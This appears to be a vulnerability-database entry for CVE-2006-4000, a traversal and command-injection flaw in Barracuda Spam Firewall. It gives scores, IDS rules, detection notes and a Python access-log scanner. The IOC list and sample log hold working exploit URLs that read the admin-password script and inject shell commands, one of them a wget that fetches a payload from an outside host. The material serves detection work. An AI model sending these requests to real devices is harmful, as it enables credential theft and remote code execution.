CVE-2006-4000
published 2006-08-05


Priority: P2 (66)
Severity: medium
CVSS 2.0 base score: 4.0
CVSS 2.0 vector: AV:N/AC:L/Au:S/C:P/I:N/A:N
Tags: ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 5.58% (91.9th percentile)
Directory traversal vulnerability in cgi-bin/preview_email.cgi in Barracuda Spam Firewall (BSF) 3.3.01.001 through 3.3.03.053 allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter.

Affected (3 ranges)

Vendor              Product                  Version range   Fixed in
barracuda_networks  barracuda_spam_firewall  –               –
barracuda_networks  barracuda_spam_firewall  –               –
barracuda_networks  barracuda_spam_firewall  –               –

Detection & IOCs (extracted from sources)

url: https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../tmp/backup/periodic_config.txt.tmp
url: https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../../bin/ls%20/|
url: https:///cgi-bin/preview_email.cgi?file=/mail/mlog/|uname%20-a|
url: https:///cgi-bin/preview_email.cgi?file=/mail/mlog|cat%20update_admin_passwd.pl|
url: https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../bin/update_admin_passwd.pl
path: /cgi-bin/preview_email.cgi
path: /mail/mlog/../tmp/backup/periodic_config.txt.tmp
path: /mail/mlog/../bin/update_admin_passwd.pl
snort (ET rule sid:2029172):
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET EXPLOIT Barracuda Spam Firewall 3.3.x RCE 2006-4000 (Outbound)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/cgi-bin/preview_email.cgi?file=/mail/mlog/|7c|"; startswith; fast_pattern; content:"http"; distance:0; reference:url,unit42.paloaltonetworks.com/mirai-variant-echobot-resurfaces-with-13-previously-unexploited-vulnerabilities/; reference:cve,2006-4000; classtype:attempted-admin; sid:2029172; rev:3; metadata:affected_product Linux, attack_target IoT, created_at 2019_12_16, cve CVE_2006_4000, deployment Perimeter, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_04_13;)
snort (ET rule sid:2029173):
alert http $EXTERNAL_NET any -> any any (msg:"ET EXPLOIT Barracuda Spam Firewall 3.3.x RCE 2006-4000 (Inbound)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/cgi-bin/preview_email.cgi?file=/mail/mlog/|7c|"; startswith; fast_pattern; content:"http"; distance:0; reference:url,unit42.paloaltonetworks.com/mirai-variant-echobot-resurfaces-with-13-previously-unexploited-vulnerabilities/; reference:cve,2006-4000; classtype:attempted-admin; sid:2029173; rev:3; metadata:affected_product Linux, attack_target IoT, created_at 2019_12_16, cve CVE_2006_4000, deployment Perimeter, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_04_13;)
bytes (URI prefix both rules key on):
/cgi-bin/preview_email.cgi?file=/mail/mlog/|7c|
  • Exploit traffic is an HTTP GET to /cgi-bin/preview_email.cgi whose 'file' parameter begins with /mail/mlog/ and carries pipe characters (literal | or URL-encoded %7c) around a shell command; match on that URI prefix followed by a pipe-delimited command.
  • Directory traversal attempts use '../' sequences in the 'file' parameter to escape /mail/mlog and reach files such as update_admin_passwd.pl or periodic_config.txt.tmp. Note that the CVE text describes only an authenticated arbitrary-file read, while the in-the-wild traffic listed above abuses the same parameter for command execution.
  • Command injection wraps the command in the Unix pipe metacharacter '|' (also encoded as %7c), e.g. |uname%20-a|, inside the file parameter of preview_email.cgi.
  • Attackers may read /mail/mlog/../bin/update_admin_passwd.pl to recover admin credential material from the Barracuda device.
  • Several web directories are reachable without authentication and may be probed during reconnaissance: /Translators/, /images/, /locale, /plugins, /help.
  • The Mirai variant EchoBot has exploited this vulnerability; correlate CVE-2006-4000 exploitation attempts with known Mirai/EchoBot C2 infrastructure.
  • In the ET rules (sid:2029172 / sid:2029173), |7c| is the standard pipe-hex notation for the literal '|' byte, not a feature that has to be enabled. The match runs against the normalized http.uri buffer, so confirm with a test pcap that your engine decodes a %7c-encoded pipe in the query string before matching, and add a raw-URI variant if it does not. The http.method / http.uri / startswith keywords are Suricata syntax; Snort deployments need the ET rule set built for their engine.
  • Both rules also require the string 'http' somewhere after the injected pipe (content:"http"; distance:0), i.e. the attacker embedding a download URL in the injected command, as EchoBot does when it fetches its payload. A plain command such as |uname -a| with no URL will not fire them, so pair the signatures with a broader check for a pipe or '..' in the file parameter.
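The checks described in the bullets above, run over access-log lines, as an added example (not code from the page's sources or from Barracuda). It flags three things per request to preview_email.cgi: a file argument that resolves outside /mail/mlog (the root is assumed from the IOC paths), a pipe in the file argument, and whether the stricter ET-rule condition (pipe immediately after /mail/mlog/ and 'http' later in the URI) would also have matched. The log lines are constructed, not captured.

```python
"""Flag CVE-2006-4000 exploitation attempts in combined-format access logs.

Added example; the sample log below is constructed, and ALLOWED_ROOT is an
assumption taken from the IOC paths on the page.
"""
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

CGI_PATH = "/cgi-bin/preview_email.cgi"
ALLOWED_ROOT = "/mail/mlog"  # assumed directory the script is meant to serve previews from

# Same condition ET sids 2029172/2029173 express: file= begins /mail/mlog/ followed
# by a pipe, and "http" appears later in the (decoded) URI.
ET_RULE_PATTERN = re.compile(r"^/cgi-bin/preview_email\.cgi\?file=/mail/mlog/\|.*http")

# Combined log format request line; the URI token must not contain raw spaces,
# which holds for the IOCs above because they encode spaces as %20.
LOG_LINE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<uri>\S+)'
)

# Constructed sample: one EchoBot-style download, one traversal, one plain command
# injection, one legitimate preview, one unrelated request.
SAMPLE_LOG = """\
203.0.113.5 - - [16/Dec/2019:10:01:02 +0000] "GET /cgi-bin/preview_email.cgi?file=/mail/mlog/|wget%20http://198.51.100.7/x.sh| HTTP/1.1" 200 512
203.0.113.5 - - [16/Dec/2019:10:01:03 +0000] "GET /cgi-bin/preview_email.cgi?file=/mail/mlog/../bin/update_admin_passwd.pl HTTP/1.1" 200 3021
203.0.113.9 - - [16/Dec/2019:10:02:17 +0000] "GET /cgi-bin/preview_email.cgi?file=/mail/mlog/%7Cuname%20-a%7C HTTP/1.1" 200 77
198.51.100.2 - - [16/Dec/2019:10:03:40 +0000] "GET /cgi-bin/preview_email.cgi?file=/mail/mlog/msg12345.txt HTTP/1.1" 200 1840
198.51.100.2 - - [16/Dec/2019:10:03:41 +0000] "GET /images/logo.gif HTTP/1.1" 200 4096
"""


def classify_uri(raw_uri):
    """Return None for requests to other paths, otherwise a dict of findings."""
    parts = urlsplit(raw_uri)
    if parts.path != CGI_PATH:
        return None
    values = parse_qs(parts.query, keep_blank_values=True).get("file", [""])
    file_arg = values[0]  # parse_qs percent-decodes, so %7C and a literal | look the same
    normalized = posixpath.normpath(file_arg) if file_arg else ""
    inside_root = normalized == ALLOWED_ROOT or normalized.startswith(ALLOWED_ROOT + "/")
    return {
        "file": file_arg,
        # '..' segments (or anything else) that resolve outside /mail/mlog
        "escapes_root": bool(file_arg) and not inside_root,
        # a pipe in the name is what turns the file open into command execution
        "cmd_injection": "|" in file_arg,
        # what the ET signatures would fire on, evaluated against the decoded URI
        "et_rule_hit": ET_RULE_PATTERN.match(unquote(raw_uri)) is not None,
    }


def scan_log(text):
    """Return one alert dict per request that escapes the root or injects a command."""
    alerts = []
    for line in text.splitlines():
        match = LOG_LINE.match(line)
        if not match:
            continue
        verdict = classify_uri(match.group("uri"))
        if verdict and (verdict["escapes_root"] or verdict["cmd_injection"]):
            alerts.append({"src": match.group("src"), "uri": match.group("uri"), **verdict})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(
            alert["src"],
            "escapes_root=%s cmd_injection=%s et_rule_hit=%s"
            % (alert["escapes_root"], alert["cmd_injection"], alert["et_rule_hit"]),
            alert["uri"],
        )
```

The third sample line shows the gap between the signature and the broader check: |uname -a| carries no URL, so et_rule_hit stays False while cmd_injection is True. Requests whose file argument stays under /mail/mlog and contains no pipe produce no alert.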

CVSS provenance

NVD: CVSS v2.0, 4.0 MEDIUM, AV:N/AC:L/Au:S/C:P/I:N/A:N
VulnCheck: 4.0 MEDIUM